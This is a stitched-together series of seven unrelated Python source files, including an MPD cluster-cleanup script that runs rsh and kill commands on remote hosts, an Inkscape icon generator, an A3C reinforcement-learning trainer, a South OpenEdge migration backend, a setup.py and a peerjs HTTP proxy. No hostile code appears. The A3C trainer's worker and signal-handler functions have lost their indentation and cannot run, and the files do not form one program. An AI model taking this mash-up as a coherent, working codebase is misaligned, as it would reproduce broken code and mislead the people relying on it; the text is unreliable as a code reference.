        # Clean each remote host in the background ('#' lines are skipped).
        for host in hosts:
            host = host.strip()
            if host[0] != '#':
                try: remoteIP = socket.gethostbyname_ex(host)[2]
                except: remoteIP = 'unknownremote'
                if localIP == remoteIP: # local machine handled last below loop
                    continue
                cmd = '%s %s -n %s %s %s &' % (rshCmd, xOpt, host, cleanCmd, cleanFile)
                if verbose:
                    print 'cmd=:%s:' % (cmd)
                os.system(cmd)
                if killCmd:
                    cmd = "%s %s -n %s \"/bin/sh -c '%s' &\"" % (rshCmd, xOpt, host, killCmd)
                    if verbose:
                        print "cmd=:%s:" % (cmd)
                    os.system(cmd)
    ## clean up local machine last
    cmd = '%s %s' % (cleanCmd,cleanFile)
    if verbose:
        print 'cmd=:%s:' % (cmd)
    os.system(cmd)
    if killCmd:
        if verbose:
            print 'cmd=:%s:' % (killCmd)
        os.system(killCmd)
def usage():
    """Print the module usage text and exit with a failure status."""
    print __doc__
    sys.exit(-1)
# Script entry point.
if __name__ == '__main__':
    mpdcleanup()
|
import os
import sys
import re
import subprocess
import codecs
from PIL import Image
def GetFileContent (fileName):
    """Read the whole of fileName as UTF-8 text and return it."""
    with codecs.open (fileName, 'r', 'utf-8') as sourceFile:
        return sourceFile.read ()
def SetFileContent (fileName, content):
    """Write content to fileName as UTF-8 text, replacing any existing file."""
    with codecs.open (fileName, 'w', 'utf-8') as targetFile:
        targetFile.write (content)
def GenerateColoredSvg (sourceIconPath, coloredSvgIconPath, color):
    """Copy an svg icon, replacing every 6-digit hex color with `color`."""
    svgContent = GetFileContent (sourceIconPath)
    recolored = re.sub (r'#[0-9a-fA-F]{6}', color, svgContent)
    SetFileContent (coloredSvgIconPath, recolored)
def GeneratePng (inkscapePath, sourceSvgPath, resultPngPath, size):
    """Render sourceSvgPath to a size x size png via the Inkscape CLI."""
    subprocess.call ([
        inkscapePath,
        '--export-png=' + resultPngPath,
        '--export-width=' + str (size),
        '--export-height=' + str (size),
        sourceSvgPath
    ])
def GenerateColoredSvgsFromSvgs (sourceFolder, targetFolder, color):
    """Recolor every svg in sourceFolder into targetFolder (created if needed)."""
    if not os.path.exists (targetFolder):
        os.makedirs (targetFolder)
    for svgName in os.listdir (sourceFolder):
        GenerateColoredSvg (os.path.join (sourceFolder, svgName),
                            os.path.join (targetFolder, svgName),
                            color)
def GeneratePngsFromSvgs (inkscapePath, iconsPath, svgFolderName, pngFolderPrefix, sizes):
    # NOTE(review): dead code — this 5-argument definition is immediately
    # shadowed by the 4-argument GeneratePngsFromSvgs defined right below,
    # so it can never be called from this module. Consider deleting it,
    # or renaming it if it is still needed.
    svgIconsPath = os.path.join (iconsPath, svgFolderName)
    for svgName in os.listdir (svgIconsPath):
        for size in sizes:
            pngIconsPath = os.path.join (iconsPath, pngFolderPrefix + str (size))
            if not os.path.exists (pngIconsPath):
                os.makedirs (pngIconsPath)
            svgBaseName = os.path.splitext (svgName)[0]
            sourceIconPath = os.path.join (svgIconsPath, svgName)
            targetPngPath = os.path.join (pngIconsPath, svgBaseName + '.png')
            GeneratePng (inkscapePath, sourceIconPath, targetPngPath, size)
def GeneratePngsFromSvgs (inkscapePath, sourcePath, targetPath, size):
    """Render every svg in sourcePath to a png of the given size in targetPath."""
    if not os.path.exists (targetPath):
        os.makedirs (targetPath)
    for svgName in os.listdir (sourcePath):
        baseName = os.path.splitext (svgName)[0]
        GeneratePng (inkscapePath,
                     os.path.join (sourcePath, svgName),
                     os.path.join (targetPath, baseName + '.png'),
                     size)
def GenerateBmpsFromPngs (sourcePath, targetPath):
    """Convert every png in sourcePath to a same-named bmp in targetPath."""
    if not os.path.exists (targetPath):
        os.makedirs (targetPath)
    for pngName in os.listdir (sourcePath):
        baseName = os.path.splitext (pngName)[0]
        pngImage = Image.open (os.path.join (sourcePath, pngName))
        pngImage.save (os.path.join (targetPath, baseName + '.bmp'))
def Main (argv):
    """Generate colored svg, png and bmp variants of the documentation icons.

    argv: command-line arguments; argv[1] must be the path of the Inkscape
    executable used for svg -> png rendering.
    Returns 0 on success, 1 on a usage error.
    """
    currentDir = os.path.dirname (os.path.abspath (__file__))
    os.chdir (currentDir)
    if len (argv) != 2:
        print ('usage: GenerateIcons.py <inkscapePath>')
        # FIX: raw string — the previous non-raw literal relied on \P and
        # \I being unrecognized escapes (a DeprecationWarning in modern
        # Python); the printed text is unchanged.
        print (r'example: GenerateIcons.py "C:\Program Files\Inkscape\inkscape.com"')
        return 1
    # FIX: was sys.argv[1]; use the argv parameter so Main honors its own
    # argument (identical behavior for the sys.exit (Main (sys.argv)) call).
    inkscapePath = argv[1]
    # Each descriptor: an icon folder plus the recolorings and the
    # png/bmp sizes to produce for it.
    iconDescriptors = [
        {
            'path' : os.path.abspath (os.path.join ('..', 'Documentation', 'CommandIcons')),
            'settings' : {
                'colors' : [
                    { 'name' : 'gray', 'color' : '#BBBBBB' }
                ],
                'pngs' : [
                    {
                        'color' : None,
                        'sizes' : [18, 36],
                        'bmp' : True
                    },
                    {
                        'color' : 'gray',
                        'sizes' : [18, 36],
                        'bmp' : True
                    }
                ]
            }
        },
        {
            'path' : os.path.abspath (os.path.join ('..', 'Documentation', 'NodeIcons')),
            'settings' : {
                'colors' : [
                    { 'name' : 'white', 'color' : '#FAFAFA' }
                ],
                'pngs' : [
                    {
                        'color' : None,
                        'sizes' : [18, 36],
                        'bmp' : True
                    },
                    {
                        'color' : 'white',
                        'sizes' : [18, 36],
                        'bmp' : True
                    }
                ]
            }
        }
    ]
    for iconDescriptor in iconDescriptors:
        # First produce the recolored svg_<name> folders from the base svgs.
        svgIconsPath = os.path.join (iconDescriptor['path'], 'svg')
        for color in iconDescriptor['settings']['colors']:
            coloredSvgIconsPath = os.path.join (iconDescriptor['path'], 'svg_' + color['name'])
            GenerateColoredSvgsFromSvgs (svgIconsPath, coloredSvgIconsPath, color['color'])
        # Then render pngs (and optionally bmps) for each color variant.
        for png in iconDescriptor['settings']['pngs']:
            svgSourcePath = os.path.join (iconDescriptor['path'], 'svg')
            colorStr = ''
            if png['color'] != None:
                colorStr = '_' + png['color']
                svgSourcePath = os.path.join (iconDescriptor['path'], 'svg' + colorStr)
            for size in png['sizes']:
                pngTargetPath = os.path.join (iconDescriptor['path'], 'png' + colorStr + '_' + str (size))
                GeneratePngsFromSvgs (inkscapePath, svgSourcePath, pngTargetPath, size)
                if png['bmp']:
                    bmpTargetPath = os.path.join (iconDescriptor['path'], 'bmp' + colorStr + '_' + str (size))
                    GenerateBmpsFromPngs (pngTargetPath, bmpTargetPath)
    return 0
# FIX: guard the entry point so importing this module does not run the
# whole icon generation (and call sys.exit) as a side effect.
if __name__ == '__main__':
    sys.exit (Main (sys.argv))
|
import tensorflow as tf
import threading
import datetime
import signal
import os
from target_driven_method.networks.A3C_networks import A3CFFNetwork
from target_driven_method.networks.target_driven_navigation_networks import TargetDrivenFFNetwork
from target_driven_method.networks.A3C_networks import A3CLSTMNetwork
from target_driven_method.networks.target_driven_navigation_networks import TargetDrivenLSTMNetwork
from training_thread import A3CTrainingThread
from utils.ops import log_uniform
from Grid2DEnvAdapterForTargetDriven import Grid2DEnvAdapter
from constants import PARALLEL_SIZE
from constants import INITIAL_ALPHA_LOW
from constants import INITIAL_ALPHA_HIGH
from constants import INITIAL_ALPHA_LOG_RATE
from constants import MAX_TIME_STEP
from constants import CHECKPOINT_DIR
from constants import LOG_DIR
from constants import RMSP_EPSILON
from constants import RMSP_ALPHA
from constants import USE_GPU
from constants import USE_LSTM
from constants import config
if __name__ == '__main__':
    # A3C parallelism comes from threads sharing one process, so the whole
    # graph is pinned to a single device.
    device = "/gpu:0" if USE_GPU else "/cpu:0"
    # Global step counter shared (unlocked) by all worker threads.
    global_t = 0
    stop_requested = False
    # Unique run name: experiment name + launch timestamp; used for
    # checkpoint/log dirs and summary keys.
    unique_name = "{}__{}".format(config['name'], datetime.datetime.now().strftime("%Y-%m-%d_%H-%M-%S"))
    EXPERIMENT_CHECKPOINT_DIR = CHECKPOINT_DIR + "/" + unique_name
    EXPERIMENT_LOG_DIR = LOG_DIR + "/" + unique_name
    if not os.path.exists(EXPERIMENT_CHECKPOINT_DIR):
        os.makedirs(EXPERIMENT_CHECKPOINT_DIR)
    if not os.path.exists(EXPERIMENT_LOG_DIR):
        os.makedirs(EXPERIMENT_LOG_DIR)
    # Learning rate is sampled log-uniformly from [INITIAL_ALPHA_LOW, INITIAL_ALPHA_HIGH].
    initial_learning_rate = log_uniform(INITIAL_ALPHA_LOW, INITIAL_ALPHA_HIGH,
                                        INITIAL_ALPHA_LOG_RATE)
    env = Grid2DEnvAdapter(config)
    global_network_scope = "global"
    # Select the shared ("global") network: target-driven ("TDN") vs plain A3C,
    # each with an LSTM or feed-forward variant.
    if config['model'] == "TDN":
        if USE_LSTM:
            global_network = TargetDrivenLSTMNetwork(
                input_size=env.obs_size,
                device=device,
                network_scope=global_network_scope)
        else:
            global_network = TargetDrivenFFNetwork(
                input_size=env.obs_size,
                device=device,
                network_scope=global_network_scope)
    else:
        if USE_LSTM:
            global_network = A3CLSTMNetwork(
                input_size=env.obs_size,
                device=device,
                network_scope=global_network_scope)
        else:
            global_network = A3CFFNetwork(
                input_size=env.obs_size,
                device=device,
                network_scope=global_network_scope)
    # Learning rate is fed per-step so it can be annealed by the workers.
    learning_rate_input = tf.placeholder("float")
    grad_applier = tf.train.RMSPropOptimizer(
        learning_rate=learning_rate_input,
        decay=RMSP_ALPHA,
        momentum=0.0,
        epsilon=RMSP_EPSILON)
    # instantiate each training thread
    training_threads = []
    for i in range(PARALLEL_SIZE):
        training_thread = A3CTrainingThread(
            config,
            env,
            i,
            global_network_scope,
            initial_learning_rate,
            learning_rate_input,
            grad_applier,
            MAX_TIME_STEP,
            device=device
        )
        training_threads.append(training_thread)
    # prepare session
    sess = tf.Session(config=tf.ConfigProto(log_device_placement=False,
                                            allow_soft_placement=True))
    init = tf.global_variables_initializer()
    sess.run(init)
    # create tensorboard summaries (one scalar group per worker thread)
    summary_op = dict()
    summary_placeholders = dict()
    for i in range(PARALLEL_SIZE):
        key = unique_name + "_thread_" + str(i)
        # summary for tensorboard
        episode_reward_input = tf.placeholder("float")
        episode_length_input = tf.placeholder("float")
        episode_mean_loss_input = tf.placeholder("float")
        scalar_summaries = [
            tf.summary.scalar(key + "/Episode Reward", episode_reward_input),
            tf.summary.scalar(key + "/Episode Length", episode_length_input),
            tf.summary.scalar(key + "/Episode Mean Loss", episode_mean_loss_input),
        ]
        summary_op[key] = tf.summary.merge(scalar_summaries)
        summary_placeholders[key] = {
            "episode_reward_input": episode_reward_input,
            "episode_length_input": episode_length_input,
            "episode_mean_loss_input": episode_mean_loss_input,
            "learning_rate_input": learning_rate_input
        }
    summary_writer = tf.summary.FileWriter(EXPERIMENT_LOG_DIR, sess.graph)
    # init or load checkpoint with saver
    # if you don't need to be able to resume training, use the next line instead.
    # it will result in a much smaller checkpoint file.
    # saver = tf.train.Saver(max_to_keep=10, var_list=global_network.get_vars())
    saver = tf.train.Saver(max_to_keep=1000)
def train_function(parallel_index):
global global_t
training_thread = training_threads[parallel_index]
last_global_t = 0
key = unique_name + "_thread_" + str(parallel_index)
while global_t < MAX_TIME_STEP and not stop_requested:
diff_global_t = training_thread.process(
sess, global_t, summary_writer, summary_op[key],
summary_placeholders[key])
global_t += diff_global_t
# periodically save checkpoints to disk and test performance
if parallel_index == 0 and global_t - last_global_t > 10000:
print('Save checkpoint at timestamp %d' % global_t)
saver.save(
sess,
EXPERIMENT_CHECKPOINT_DIR + '/' + 'checkpoint',
global_step=global_t)
last_global_t = global_t
def signal_handler(signal, frame):
global stop_requested
print('You pressed Ctrl+C!')
stop_requested = True
    # Spawn one OS thread per parallel worker.
    train_threads = []
    for i in range(PARALLEL_SIZE):
        train_threads.append(
            threading.Thread(target=train_function, args=(i, )))
    # Install the Ctrl+C handler before the workers start so an early
    # interrupt is always caught.
    signal.signal(signal.SIGINT, signal_handler)
    # start each training thread
    for t in train_threads:
        t.start()
    print('Press Ctrl+C to stop.')
    # Block the main thread until a signal arrives; workers keep running.
    signal.pause()
    # wait for all threads to finish
    for t in train_threads:
        t.join()
    print('Now saving data. Please wait.')
    # Final checkpoint after all workers have stopped.
    saver.save(sess, EXPERIMENT_CHECKPOINT_DIR + '/' + 'checkpoint', global_step=global_t)
    summary_writer.close()
|
from __future__ import print_function
import os.path
import sys
import re
import warnings
from django.db import connection, models
from django.db.backends.util import truncate_name
from django.core.management.color import no_style
from django.db.models.fields import NOT_PROVIDED
from django.db.utils import DatabaseError
from south.utils.py3 import string_types, text_type
#from OpenEdge.pyodbc import operations
from south.db import generic
class DatabaseOperations(generic.DatabaseOperations):
    """
    OpenEdge implementation of south database operations.

    Overrides the SQL templates and a handful of schema-altering methods of
    the generic backend to match OpenEdge's dialect (notably explicit
    sequence management for auto-increment columns).
    """
    backend_name = 'OpenEdge'

    # SQL statement templates consumed by south's generic machinery.
    alter_string_set_type = 'ALTER COLUMN %(column)s TYPE %(type)s'
    alter_string_set_null = 'ALTER COLUMN %(column)s DROP NOT NULL'
    alter_string_drop_null = 'ALTER COLUMN %(column)s SET NOT NULL'
    delete_check_sql = 'ALTER TABLE %(table)s DROP CONSTRAINT %(constraint)s'
    add_column_string = 'ALTER TABLE %s ADD COLUMN %s;'
    delete_unique_sql = "ALTER TABLE %s DROP CONSTRAINT %s"
    delete_foreign_key_sql = 'ALTER TABLE %(table)s DROP CONSTRAINT %(constraint)s'
    create_table_sql = 'CREATE TABLE %(table)s (%(columns)s)'
    max_index_name_length = 32
    drop_index_string = 'DROP INDEX %(index_name)s'
    delete_column_string = 'ALTER TABLE %s DROP COLUMN %s CASCADE;'
    create_primary_key_string = "ALTER TABLE %(table)s ADD CONSTRAINT %(constraint)s PRIMARY KEY (%(columns)s)"
    delete_primary_key_sql = "ALTER TABLE %(table)s DROP CONSTRAINT %(constraint)s"
    add_check_constraint_fragment = "ADD CONSTRAINT %(constraint)s CHECK (%(check)s)"
    rename_table_sql = "ALTER TABLE %s RENAME TO %s;"
    default_schema_name = "public"

    # Feature flags advertised to south's generic operations.
    allows_combined_alters = True
    supports_foreign_keys = True
    has_check_constraints = True
    has_booleans = True
    raises_default_errors = True

    def column_sql(self, table_name, field_name, field, tablespace='', with_name=True, field_prepared=False):
        """
        Creates the SQL snippet for a column. Used by add_column and add_table.

        :param table_name: table the column belongs to (used for deferred FK/index SQL)
        :param field_name: attribute name the field is known by on the model
        :param field: a django.db.models.fields.Field instance
        :param tablespace: optional tablespace for inline unique indexes
        :param with_name: when True, prefix the snippet with the quoted column name
        :param field_prepared: skip set_attributes_from_name when the caller already did it
        :return: the SQL fragment, or None when the field produces no column
        """
        # If the field hasn't already been told its attribute name, do so.
        if not field_prepared:
            field.set_attributes_from_name(field_name)
        # hook for the field to do any resolution prior to its attributes being queried
        if hasattr(field, 'south_init'):
            field.south_init()
        # Possible hook to fiddle with the fields (e.g. defaults & TEXT on MySQL)
        field = self._field_sanity(field)
        try:
            sql = field.db_type(connection=self._get_connection())
        except TypeError:
            # Older Django versions' db_type() takes no connection argument.
            sql = field.db_type()
        if sql:
            # Some callers, like the sqlite stuff, just want the extended type.
            if with_name:
                field_output = [self.quote_name(field.column), sql]
            else:
                field_output = [sql]
            field_output.append('%s' % (not field.null and 'NOT NULL ' or ''))
            if field.primary_key:
                field_output.append('PRIMARY KEY')
            elif field.unique:
                # Just use UNIQUE (no indexes any more, we have delete_unique)
                field_output.append('UNIQUE')
            tablespace = field.db_tablespace or tablespace
            if tablespace and getattr(self._get_connection().features, "supports_tablespaces", False) and field.unique:
                # We must specify the index tablespace inline, because we
                # won't be generating a CREATE INDEX statement for this field.
                field_output.append(self._get_connection().ops.tablespace_sql(tablespace, inline=True))
            sql = ' '.join(field_output)
            sqlparams = ()
            # if the field is "NOT NULL" and a default value is provided, create the column with it
            # this allows the addition of a NOT NULL field to a table with existing rows
            if not getattr(field, '_suppress_default', False):
                if field.has_default():
                    default = field.get_default()
                    # If the default is actually None, don't add a default term
                    if default is not None:
                        # If the default is a callable, then call it!
                        if callable(default):
                            default = default()
                        default = field.get_db_prep_save(default, connection=self._get_connection())
                        default = self._default_value_workaround(default)
                        # Now do some very cheap quoting. TODO: Redesign return values to avoid this.
                        if isinstance(default, string_types):
                            default = "'%s'" % default.replace("'", "''")
                        # Escape any % signs in the output (bug #317)
                        if isinstance(default, string_types):
                            default = default.replace("%", "%%")
                        # Add it in
                        sql += " DEFAULT %s"
                        # BUG FIX: was "(default)" — parentheses around a bare
                        # value are not a tuple, so "sql % sqlparams" misbehaved
                        # for tuple-valued defaults.
                        sqlparams = (default, )
                elif (not field.null and field.blank) or (field.get_default() == ''):
                    if field.empty_strings_allowed and self._get_connection().features.interprets_empty_strings_as_nulls:
                        sql += " DEFAULT ''"
                    # Error here would be nice, but doesn't seem to play fair.
                    #else:
                    #    raise ValueError("Attempting to add a non null column that isn't character based without an explicit default value.")
            if field.rel and self.supports_foreign_keys:
                # FK constraints are emitted as deferred SQL, after the table exists.
                self.add_deferred_sql(
                    self.foreign_key_sql(
                        table_name,
                        field.column,
                        field.rel.to._meta.db_table,
                        field.rel.to._meta.get_field(field.rel.field_name).column
                    )
                )
            # Things like the contrib.gis module fields have this in 1.1 and below
            if hasattr(field, 'post_create_sql'):
                for stmt in field.post_create_sql(no_style(), table_name):
                    self.add_deferred_sql(stmt)
            # In 1.2 and above, you have to ask the DatabaseCreation stuff for it.
            # This also creates normal indexes in 1.1.
            if hasattr(self._get_connection().creation, "sql_indexes_for_field"):
                # Make a fake model to pass in, with only db_table
                model = self.mock_model("FakeModelForGISCreation", table_name)
                for stmt in self._get_connection().creation.sql_indexes_for_field(model, field, no_style()):
                    self.add_deferred_sql(stmt)
        if sql:
            return sql % sqlparams
        else:
            return None

    @generic.invalidate_table_constraints
    def create_unique(self, table_name, columns):
        """
        Creates a UNIQUE index on the columns on the given table.

        :return: the generated index name
        """
        if not isinstance(columns, (list, tuple)):
            columns = [columns]
        name = self.create_index_name(table_name, columns, suffix="_uniq")
        cols = ", ".join(map(self.quote_name, columns))
        self.execute('CREATE UNIQUE INDEX %s ON "%s" (%s)'%(name,table_name,cols))
        return name

    def _createSequence(self,table,column):
        """
        Return the backend's auto-increment (sequence) SQL statements for
        table.column, as produced by the connection's ops.autoinc_sql.
        """
        return self._get_connection().ops.autoinc_sql(table, column)

    @generic.invalidate_table_constraints
    def create_table(self, table_name, fields):
        """
        Creates the table 'table_name'. 'fields' is a tuple of fields,
        each represented by a 2-part tuple of field name and a
        django.db.models.fields.Field object
        """
        if len(table_name) > 63:
            print("    ! WARNING: You have a table name longer than 63 characters; this will not fully work on PostgreSQL or MySQL.")
        # avoid default values in CREATE TABLE statements (#925)
        for field_name, field in fields:
            field._suppress_default = True
        columns = [
            self.column_sql(table_name, field_name, field)
            for field_name, field in fields
        ]
        self.execute(self.create_table_sql % {
            "table": self.quote_name(table_name),
            "columns": ', '.join([col for col in columns if col]),
        })
        # Create the sequence backing the implicit 'id' auto-increment column.
        self.execute(self._createSequence(table_name,'id')[0])

    @generic.invalidate_table_constraints
    def add_column(self, table_name, name, field, keep_default=True):
        """
        Adds the column 'name' to the table 'table_name'.
        Uses the 'field' parameter, a django.db.models.fields.Field instance,
        to generate the necessary sql
        @param table_name: The name of the table to add the column to
        @param name: The name of the column to add
        @param field: The field to use
        """
        sql = self.column_sql(table_name, name, field)
        if sql:
            params = (
                self.quote_name(table_name),
                sql,
            )
            sql = self.add_column_string % params
            self.execute(sql)

    @generic.invalidate_table_constraints
    def delete_table(self, table_name, cascade=True):
        """
        Deletes the table 'table_name'.

        NOTE(review): the 'cascade' parameter is kept for interface
        compatibility but is currently ignored by this backend — confirm
        whether OpenEdge supports DROP TABLE ... CASCADE.
        """
        params = (self.quote_name(table_name), )
        self.execute('DROP TABLE %s;' % params)
        # Drop associated sequence
        self.execute('DROP SEQUENCE PUB.%s_%s'%('ID',table_name[:self.max_index_name_length-3]))
|
from __future__ import absolute_import
# import apis into api package
from tiledb.cloud.rest_api.api.array_api import ArrayApi
from tiledb.cloud.rest_api.api.array_tasks_api import ArrayTasksApi
from tiledb.cloud.rest_api.api.favorites_api import FavoritesApi
from tiledb.cloud.rest_api.api.invitation_api import InvitationApi
from tiledb.cloud.rest_api.api.notebook_api import NotebookApi
from tiledb.cloud.rest_api.api.notebooks_api import NotebooksApi
from tiledb.cloud.rest_api.api.organization_api import OrganizationApi
from tiledb.cloud.rest_api.api.query_api import QueryApi
from tiledb.cloud.rest_api.api.sql_api import SqlApi
from tiledb.cloud.rest_api.api.stats_api import StatsApi
from tiledb.cloud.rest_api.api.tasks_api import TasksApi
from tiledb.cloud.rest_api.api.udf_api import UdfApi
from tiledb.cloud.rest_api.api.user_api import UserApi
# flake8: noqa
|
#!/usr/bin/env python
from setuptools import setup
# Trove classifiers describing maturity, audience and supported Pythons.
_CLASSIFIERS = [
    "Development Status :: 4 - Beta",
    "Intended Audience :: Developers",
    "License :: OSI Approved :: MIT License",
    "Programming Language :: Python :: 2.7",
    "Programming Language :: Python :: 3",
]

# Package metadata for the ectou-metadata EC2 instance-metadata mock service.
setup(
    name="ectou-metadata",
    version="1.0.2",
    description="Yet another EC2 instance metadata mocking service.",
    url="https://github.com/monetate/ectou-metadata",
    author='Monetate',
    author_email='jjpersch@monetate.com',
    license="MIT",
    classifiers=_CLASSIFIERS,
    keywords="aws instance metadata",
    packages=['ectou_metadata'],
    install_requires=["boto3", "bottle"],
    # Console entry point: `ectou_metadata` runs the bottle service.
    entry_points={
        'console_scripts': [
            'ectou_metadata = ectou_metadata.service:main',
        ],
    },
    test_suite="tests",
)
|
"""Register with PNP server and wait for remote peers to connect."""
# import argparse
import os
import asyncio
import sys
import json
import yaml
import aiohttp
from typing import Any
from pathlib import Path
from loguru import logger
# from aiortc import RTCIceCandidate, RTCSessionDescription
from peerjs.peer import Peer, PeerOptions
from peerjs.peerroom import PeerRoom
from peerjs.util import util, default_ice_servers
from peerjs.enums import ConnectionEventType, PeerEventType
from aiortc.rtcconfiguration import RTCConfiguration, RTCIceServer
print(sys.version)

# Module-level mutable state shared by the async handlers below.
peer = None
savedPeerId = None
# persisted config dict — defaults target the hosted signaling server;
# the commented values are the local-development alternatives.
AMBIANIC_PNP_HOST = 'ambianic-pnp.herokuapp.com'  # 'localhost'
AMBIANIC_PNP_PORT = 443  # 9779
AMBIANIC_PNP_SECURE = True  # False
DEFAULT_LOG_LEVEL = 'INFO'
config = {
    'signaling_server': AMBIANIC_PNP_HOST,
    'port': AMBIANIC_PNP_PORT,
    'secure': AMBIANIC_PNP_SECURE,
    'ice_servers': default_ice_servers,
    'log_level': "INFO",
}
# Peer-id and config file locations; overridable via environment variables.
PEERID_FILE = '.peerjsrc'
if os.environ.get("PEERJS_PEERID_FILE"):
    PEERID_FILE = os.environ.get("PEERJS_PEERID_FILE")
CONFIG_FILE = 'peerjs-config.yaml'
if os.environ.get("PEERJS_CONFIG_FILE"):
    CONFIG_FILE = os.environ.get("PEERJS_CONFIG_FILE")
time_start = None
peerConnectionStatus = None
discoveryLoop = None
# aiohttp session reusable throughout the http proxy lifecycle
http_session = None
# flags when user requests shutdown
# via CTRL+C or another system signal
_is_shutting_down: bool = False
# async def _consume_signaling(pc, signaling):
#     while True:
#         obj = await signaling.receive()
#         if isinstance(obj, RTCSessionDescription):
#             await pc.setRemoteDescription(obj)
#             if obj.type == "offer":
#                 # send answer
#                 await pc.setLocalDescription(await pc.createAnswer())
#                 await signaling.send(pc.localDescription)
#         elif isinstance(obj, RTCIceCandidate):
#             pc.addIceCandidate(obj)
#         elif obj is None:
#             print("Exiting")
#             break
async def join_peer_room(peer=None):
    """Join the local peer room and log its current membership."""
    # first try to find the remote peer ID in the same room
    room = PeerRoom(peer)
    logger.debug('Fetching room members...')
    member_ids = await room.getRoomMembers()
    logger.info('myRoom members {}', member_ids)
def _savePeerId(peerId=None):
assert peerId
global savedPeerId
savedPeerId = peerId
with open(PEERID_FILE, 'w') as outfile:
json.dump({'peerId': peerId}, outfile)
def _loadPeerId():
    """Load and reuse saved peer ID if there is one."""
    global savedPeerId
    peer_id_path = Path(PEERID_FILE)
    if not peer_id_path.exists():
        # No saved id yet; leave savedPeerId untouched.
        return
    with peer_id_path.open() as infile:
        stored = yaml.load(infile, Loader=yaml.SafeLoader)
    # An empty/corrupt file parses to None; treat that as "no saved id".
    savedPeerId = stored.get('peerId', None) if stored is not None else None
def _loadConfig():
    """Load the persisted YAML config (if any) and fill in defaults.

    :return: True when the config file existed on disk, False otherwise
        (callers use this to decide whether to write the defaults back).
    """
    logger.info('Loading configuration')
    global config
    conf_file = Path(CONFIG_FILE)
    exists = conf_file.exists()
    if exists:
        logger.info(f'Loading config from: {conf_file}')
        with conf_file.open() as infile:
            config = yaml.load(infile, Loader=yaml.SafeLoader)
    else:
        logger.info(f'Config file not found: {conf_file}')
    # Set defaults: an empty YAML file parses to None.
    if config is None:
        config = {}
    # setdefault replaces the previous "if key not in config.keys()" checks.
    config.setdefault("signaling_server", AMBIANIC_PNP_HOST)
    config.setdefault("port", AMBIANIC_PNP_PORT)
    config.setdefault("secure", AMBIANIC_PNP_SECURE)
    config.setdefault("ice_servers", default_ice_servers)
    return exists
def _saveConfig():
    """Write the current config to CONFIG_FILE, excluding the peer id."""
    global config
    persisted = config.copy()
    # The peer id lives in its own file; never persist it with the config.
    persisted.pop('peerId', None)
    with open(CONFIG_FILE, 'w') as outfile:
        yaml.dump(persisted, outfile)
def _setPnPServiceConnectionHandlers(peer=None):
    """Register signaling-server lifecycle callbacks on the given peer."""
    assert peer
    global savedPeerId
    @peer.on(PeerEventType.Open)
    async def peer_open(id):
        # Fired when the signaling connection is established and an id assigned.
        logger.info('Peer signaling connection open.')
        global savedPeerId
        # Workaround for peer.reconnect deleting previous id
        if peer.id is None:
            logger.info('pnpService: Received null id from peer open')
            peer.id = savedPeerId
        else:
            if savedPeerId != peer.id:
                logger.info(
                    'PNP Service returned new peerId. Old {}, New {}',
                    savedPeerId,
                    peer.id
                )
            # Persist whatever id the server settled on.
            _savePeerId(peer.id)
        logger.info('savedPeerId: {}', peer.id)
    @peer.on(PeerEventType.Disconnected)
    async def peer_disconnected(peerId):
        global savedPeerId
        logger.info('Peer {} disconnected from server.', peerId)
        # Workaround for peer.reconnect deleting previous id
        if not peer.id:
            logger.debug('BUG WORKAROUND: Peer lost ID. '
                         'Resetting to last known ID.')
            peer._id = savedPeerId
            peer._lastServerId = savedPeerId
    @peer.on(PeerEventType.Close)
    def peer_close():
        # peerConnection = null
        logger.info('Peer connection closed')
    @peer.on(PeerEventType.Error)
    def peer_error(err):
        logger.exception('Peer error {}', err)
        logger.warning('peerConnectionStatus {}', peerConnectionStatus)
        # retry peer connection in a few seconds
        # loop = asyncio.get_event_loop()
        # loop.call_later(3, pnp_service_connect)
    # remote peer tries to initiate connection
    @peer.on(PeerEventType.Connection)
    async def peer_connection(peerConnection):
        logger.info('Remote peer trying to establish connection')
        _setPeerConnectionHandlers(peerConnection)
async def _fetch(url: str = None, method: str = 'GET') -> Any:
global http_session
if method == 'GET':
async with http_session.get(url) as response:
content = await response.read()
# response_content = {'name': 'Ambianic-Edge', 'version': '1.24.2020'}
# rjson = json.dumps(response_content)
return response, content
elif method == 'PUT':
async with http_session.put(url) as response:
content = await response.read()
return response, content
else:
raise NotImplementedError(
f'HTTP method ${method} not implemented.'
' Contributions welcome!')
async def _pong(peer_connection=None):
"""Respond to client ping."""
response_header = {
'status': 200,
}
header_as_json = json.dumps(response_header)
logger.debug('sending keepalive pong back to remote peer')
await peer_connection.send(header_as_json)
await peer_connection.send('pong')
async def _ping(peer_connection=None, stop_flag=None):
while not stop_flag.is_set():
# send HTTP 202 Accepted status code to inform
# client that we are still waiting on the http
# server to complete its response
ping_as_json = json.dumps({'status': 202})
await peer_connection.send(ping_as_json)
logger.info('webrtc peer: http proxy response to client ping. '
'Keeping datachannel alive.')
await asyncio.sleep(1)
def _setPeerConnectionHandlers(peerConnection):
    """Wire up data-channel handlers that proxy HTTP requests for a remote peer."""
    @peerConnection.on(ConnectionEventType.Open)
    async def pc_open():
        logger.info('Connected to: {}', peerConnection.peer)
    # Handle incoming data (messages only since this is the signal sender)
    @peerConnection.on(ConnectionEventType.Data)
    async def pc_data(data):
        # Each message is a JSON-encoded request dict (kwargs for _fetch).
        logger.debug('data received from remote peer \n{}', data)
        request = json.loads(data)
        # check if the request is just a keepalive ping
        if (request['url'].startswith('ping')):
            logger.debug('received keepalive ping from remote peer')
            await _pong(peer_connection=peerConnection)
            return
        logger.info('webrtc peer: http proxy request: \n{}', request)
        # schedule frequent pings while waiting on response_header
        # to keep the peer data channel open
        waiting_on_fetch = asyncio.Event()
        asyncio.create_task(_ping(peer_connection=peerConnection,
                                  stop_flag=waiting_on_fetch))
        response = None
        try:
            logger.debug(f'Proxy forwarding HTTP request: {request}.')
            response, content = await _fetch(**request)
            logger.debug(f'Proxy received HTTP response: {response}.')
        except Exception as e:
            logger.exception('Error {} while fetching response'
                             ' with request: \n {}',
                             e, request)
        finally:
            # fetch completed, cancel pings
            waiting_on_fetch.set()
        if not response:
            response_header = {
                # internal server error code
                'status': 500
            }
            response_content = None
            # NOTE(review): the 500 header built above is never sent before
            # this early return, so the remote client is not told the fetch
            # failed — confirm whether a send was intended here.
            return
        response_content = content
        # Minimal header subset forwarded back over the data channel.
        response_header = {
            'status': response.status,
            'content-type': response.headers.get('content-type', 'None'),
            'content-length': len(response_content)
        }
        logger.info('Proxy fetched response with headers: \n{}', response.headers)
        logger.info('Answering request: \n{} '
                    'response header: \n {}',
                    request, response_header)
        header_as_json = json.dumps(response_header)
        await peerConnection.send(header_as_json)
